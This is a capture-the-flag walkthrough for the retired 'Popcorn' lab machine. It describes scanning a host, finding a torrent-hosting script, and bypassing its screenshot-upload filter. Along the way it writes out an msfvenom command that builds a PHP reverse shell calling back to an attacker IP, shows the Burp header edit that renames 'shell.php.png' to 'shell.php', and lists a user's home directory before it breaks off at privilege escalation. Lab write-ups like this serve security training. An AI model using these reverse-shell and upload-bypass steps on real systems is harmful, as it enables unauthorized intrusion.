Today we’re going to solve another CTF machine “Popcorn”. It is now retired box and can be accessible if you’re a VIP member.
- Target OS: Linux
- Services: SSH, HTTP
- IP Address: 10.10.10.6
- Difficulty: Easy
- Bypassing Image Uploading Restriction
- Linux PAM 1.1.0
- Getting user
- Getting root
As always, the first step consists of reconnaissance phase as port scanning.
During this step we’re gonna identify the target to see what we have behind the IP Address.
Since we have an Port 80 and Apache let’s take a look at it.
We have a page ‘It works!” Since we don’t have any other way to look around let’s take a look at the hidden directories.
For that you can use these tools.
We found our directory “http://10.10.10.6/torrent/” Let’s take a look,
So we have a torrent script running and after registration i found we can upload torrent file and screenshots. Since this script looks outdated let’s try uploading our shell and bypass image restrictions.
Let’s upload our torrent file.
After successfully uploading our torrent file we don’t have image uploading field let’s take a look at “My Torrents”
We can see now that we have an option to upload screenshots and that’s what we needed to move ahead.
Let’s try our luck and upload a shell.
Let’s create a php shell. We can use msfvenom for now but there’s many ways to do it.
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.4 LPORT=1337 -f raw > shell.php
So now we have a ‘shell.php’ but we have to upload an image. To do that we’re gonna rename our ‘shell.php’ to ‘shell.php.png’ for now and upload it and intercept via burp suite.
Let’s upload our shell and intercept via burp suite.
Content-Disposition: form-data; name=“file”; filename=“shell.php.png” Content-Type: image/png
Change “shell.php.png” to “shell.php” and send the request.
Response after uploading shell.
After successfully uploading our shell we don’t know what’s the actual path it uploaded.
We have to run dirbuster inside torrent directory so we can enumerate more directories.
We got our directory ‘upload’ and let’s take a look at it.
So we got the reverse shell.
After getting a user we’re gonna move forward.
Let’s get straight into getting root for that we normally do some basics findings and run privilege escalation scripts.
So for that we’re gonna ls -la on /home/george/
drwxr-xr-x 3 george george 4096 2017-03-17 23:16 . drwxr-xr-x 3 root root 4096 2017-03-17 16:49 … -rw------- 1 root root 2769 2017-05-05 23:12 .bash_history -rw-r–r-- 1 george george 220 2017-03-17 16:49 .bash_logout -rw-r–r-- 1 george george 3180 2017-03-17 16:49 .bashrc drwxr-xr-x 2 george george 4096 2017-03-17 18:58 .cache -rw------- 1 root root 1571 2017-03-17 21:11 .mysql_history -rw------- 1 root root 19 2017-05-05 23:12 .nano_history -rw-r–r-- 1 george george 675 2017-03-17 16:49 .profile -rw-r–r-- 1 george george 0 2017-03-17 18:58 .sudo_as_admin_successful -rw-r–r-- 1 george george 848727 2017-03-17 18:57 torrenthoster.zip -rw-r–r-- 1 george george 33 2017-03-17 23:16 user.txt
After taking a look at .cache we have a uncommon file.
We can also do ls -lAR
./.cache: total 0 -rw-r–r-- 1 george george 0 2017-03-17 18:58 motd.legal-displayed
As it displayed we have an uncommon file inside .cache “motd.legal-displayed”
After doing some google research we have our exploit!